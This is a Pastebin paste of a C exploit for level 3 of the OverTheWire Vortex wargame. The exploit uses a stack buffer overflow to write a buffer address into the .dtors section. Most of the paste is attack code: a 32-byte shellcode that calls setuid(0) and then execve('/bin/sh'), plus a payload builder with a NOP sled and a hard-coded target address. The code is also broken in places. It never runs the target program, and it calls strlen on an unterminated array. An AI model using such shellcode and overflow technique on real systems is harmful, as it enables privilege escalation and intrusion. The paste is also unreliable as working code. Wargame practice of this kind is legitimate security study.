Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /* Vortex wargames exploit for level 3 - http://www.overthewire.org/wargames/vortex/level03
- * by al3x - 2008.
- * Stack based buffer overflow to overwrite lpp pointer which has to be in the correct range.
- * if (((unsigned long) lpp & 0xffff0000) != 0x08040000)
- *
- * 28 **lpp = (unsigned long) &buf;
- * Writes address of buffer into dtors section by using
- * 08049610 l O .data00000000 p.5841
- */
- #include <unistd.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #define NOP 0x90
- /* 32 bytes setuid(0) + execve("/bin/sh",["/bin/sh",NULL]); */
- char shellcode[] =
- "\x6a\x17" // push $0x17
- "\x58" // pop %eax
- "\x31\xdb" // xor %ebx, %ebx
- "\xcd\x80" // int $0x80
- "\x31\xd2" // xor %edx, %edx
- "\x6a\x0b" // push $0xb
- "\x58" // pop %eax
- "\x52" // push %edx
- "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
- "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
- "\x89\xe3" // mov %esp, %ebx
- "\x52" // push %edx
- "\x53" // push %ebx
- "\x89\xe1" // mov %esp, %ecx
- "\xcd\x80"; // int $0x80
- int main(int argc, char *argv[]) {
- if (argc != 2)
- printf("%s <vuln program>\n",argv[0]);
- char addr[] = "\x10\x96\x04\x08";
- char nops[97];
- int i, len, ret;
- // 32 + 97 + 4 = 133
- printf("sclen = %d\n", sizeof(shellcode));
- printf("nops = %d\n",sizeof(nops));
- printf("addr = %d\n",sizeof(addr));
- len = sizeof(shellcode) + sizeof(nops) + sizeof(addr);
- char buf[len];
- memcpy(buf, shellcode,strlen(shellcode));
- for (i = 0; i < sizeof(nops); i++)
- nops[i] = NOP;
- memcpy(buf+strlen(shellcode),nops,strlen(nops));
- memcpy(buf+(strlen(shellcode)+strlen(nops)),addr,strlen(addr));
- char *nargv[] = {argv[1],buf, (char *)0};
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement